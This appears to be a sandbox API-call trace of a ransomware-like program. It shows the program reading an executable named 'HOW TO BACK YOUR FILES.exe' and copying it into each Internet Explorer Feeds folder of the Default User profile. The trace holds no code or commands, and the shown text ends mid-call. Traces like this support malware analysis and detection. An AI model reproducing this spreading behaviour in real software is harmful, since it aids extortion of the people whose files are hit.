0 [0078.675] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.675] GetLastError () returned 0x0 [0078.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.675] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.675] CloseHandle (hObject=0xa4) returned 1 [0078.675] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.675] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.675] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.676] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.676] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0078.676] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache" [0078.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.676] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.676] GetLastError () returned 0x0 [0078.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.677] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.677] CloseHandle (hObject=0xa4) returned 1 [0078.677] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.677] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.677] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.677] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.677] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.677] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.677] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.677] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.678] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.678] GetLastError () returned 0x0 [0078.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.678] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.678] CloseHandle (hObject=0xa4) returned 1 [0078.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.678] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.678] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.679] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.679] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.679] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.679] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.679] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.679] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.680] GetLastError () returned 0x0 [0078.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.680] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.680] CloseHandle (hObject=0xa4) returned 1 [0078.680] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.680] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.680] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.680] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.680] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.680] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.680] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.680] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.681] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.681] GetLastError () returned 0x0 [0078.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.681] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.681] CloseHandle (hObject=0xa4) returned 1 [0078.681] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.681] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.682] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.682] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.682] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.682] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.682] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.682] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.682] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.683] GetLastError () returned 0x0 [0078.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.683] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.683] CloseHandle (hObject=0xa4) returned 1 [0078.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.683] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.683] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.683] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.683] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" [0078.683] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds" [0078.683] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.683] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.684] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.684] GetLastError () returned 0x0 [0078.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.684] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.684] CloseHandle (hObject=0xa4) returned 1 [0078.684] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.684] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.685] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.685] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.685] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.685] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.685] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.685] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.685] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.686] GetLastError () returned 0x0 [0078.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.686] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.686] CloseHandle (hObject=0xa4) returned 1 [0078.686] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.686] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.686] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.686] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.686] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.686] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.686] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.686] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.687] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.687] GetLastError () returned 0x0 [0078.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.687] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.687] CloseHandle (hObject=0xa4) returned 1 [0078.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.688] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.688] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.688] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.688] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.688] lstrcatW 